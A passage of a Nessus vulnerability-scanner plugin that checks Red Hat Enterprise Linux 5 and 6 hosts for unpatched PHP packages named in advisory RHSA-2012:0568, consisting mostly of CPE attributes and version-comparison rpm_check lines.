value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.3|5\\.6|6\\.0|6\\.1)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.3 / 5.6 / 6.0 / 6.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0568\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-cli-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-cli-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-cli-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-common-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-common-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-common-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-common-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-common-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-dba-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-dba-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-dba-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-devel-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-devel-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-devel-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-gd-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-gd-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-gd-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-imap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-imap-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-imap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-ldap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-ldap-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-mysql-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-mysql-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-odbc-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-odbc-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-pdo-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-pdo-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-snmp-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-snmp-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-soap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-soap-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-soap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-xml-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-xml-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-xml-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-23.3.el5_3\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-27.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-23.3.el5_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-bcmath-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-bcmath-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-bcmath-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-bcmath-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-bcmath-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-bcmath-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-cli-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-cli-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-cli-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-cli-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-cli-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-cli-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-common-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-common-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-common-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-common-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-common-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-common-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-dba-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-dba-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-dba-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-dba-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-dba-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-dba-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-debuginfo-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-debuginfo-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-debuginfo-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-debuginfo-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-debuginfo-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-debuginfo-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-devel-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-devel-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-devel-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-devel-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-devel-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-devel-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-embedded-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-embedded-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-embedded-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-embedded-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-embedded-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-embedded-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-enchant-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-enchant-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-enchant-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-enchant-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-enchant-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-enchant-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-gd-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-gd-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-gd-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-gd-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-gd-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-gd-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-imap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-imap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-imap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-imap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-imap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-imap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-intl-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-intl-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-intl-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-intl-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-intl-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-intl-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-ldap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-ldap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"php-ldap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"s390x\", reference:\"php-ldap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"php-ldap-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"x86_64\", reference:\"php-ldap-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"php-mbstring-5.3.3-3.el6_1.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"0\", cpu:\"i686\", reference:\"php-mbstring-5.3.2-6.el6_0.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", 